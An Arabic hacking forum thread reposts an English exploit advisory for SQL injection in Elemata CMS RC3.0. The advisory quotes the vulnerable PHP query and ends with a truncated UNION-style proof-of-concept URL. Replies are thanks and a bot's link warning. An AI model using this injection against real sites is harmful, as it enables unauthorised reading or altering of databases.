حالة الموضوع:
مغلق
  1. rachi-dz

    rachi-dz Developer

    الأنتساب:
    ‏6 يونيو 2012
    المشاركات:
    57
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    طالب
    الإقامة:
    القيسة كدد
    السلام عليكم ورحمه الله وبركاتة


    ثغرة جديدة فى سكربت


    Elemata CMS RC3.0


    الثغرة
    كود PHP:
    # Exploit Title : Elemata CMS RC3.0 SQL Injection
    # Date : 23 June 2013
    # Exploit Author : CWH Underground
    # Site : www.2600.in.th
    # Vendor Homepage : http://www.elemata.com/
    # Software Link : http://jaist.dl.sourceforge.net/proj...emataRC3.0.zip
    # Version : RC 3.0
    # Tested on : Window and Linux

    ,--^----------,--------,-----,-------^--,
    | ||||||||| `
    --------' | O .. CWH Underground Hacking Team ..
    `+---------------------------^----------|
    `
    \_,-------, _________________________|
    / XXXXXX /
    `| /
    XXXXXX / `\ /
    / XXXXXX /\______(
    / XXXXXX /
    / XXXXXX /
    (________(
    `------'

    ##############################
    VULNERABILITY: SQL Injection
    ##############################

    /functions/global.php (LINE: 24-30)

    -----------------------------------------------------------------------------
    function e_meta($id)
    {
    include ("Connections/default.php");
    mysql_select_db($database_default, $default);
    $query_meta = "SELECT * FROM posts WHERE id = '
    $id'";
    $meta = mysql_query($query_meta, $default) or die(mysql_error());
    $row_meta = mysql_fetch_assoc($meta);
    -----------------------------------------------------------------------------

    ################################################## ###
    DESCRIPTION FOR SQL INJECTION
    ################################################## ###

    An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
    User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
    An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
    depending on the query, DBMS and configuration.

    POC:

    http://http://localhost/elemata/?id=...L,NULL,NULL--+

    Then View Source !! 
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. C.T

    C.T Developer

    الأنتساب:
    ‏10 مارس 2012
    المشاركات:
    19
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: Elemata CMS RC3.0 SQL Injection Vulnerability

    وعليكم السلام ورحمة الله وبركاته

    يعطيك العافية
    :{1}:​
     
  4. belhadj47

    belhadj47 Developer

    الأنتساب:
    ‏8 ديسمبر 2011
    المشاركات:
    58
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الجزائر
    رد: Elemata CMS RC3.0 SQL Injection Vulnerability

    مشكور أخي جاري تقييمك
     
  5. mr.mourad

    mr.mourad <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏8 يوليو 2013
    المشاركات:
    170
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    رد: Elemata CMS RC3.0 SQL Injection Vulnerability

    يعطيك العافية اخي شكراً جزيلاً :{1}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة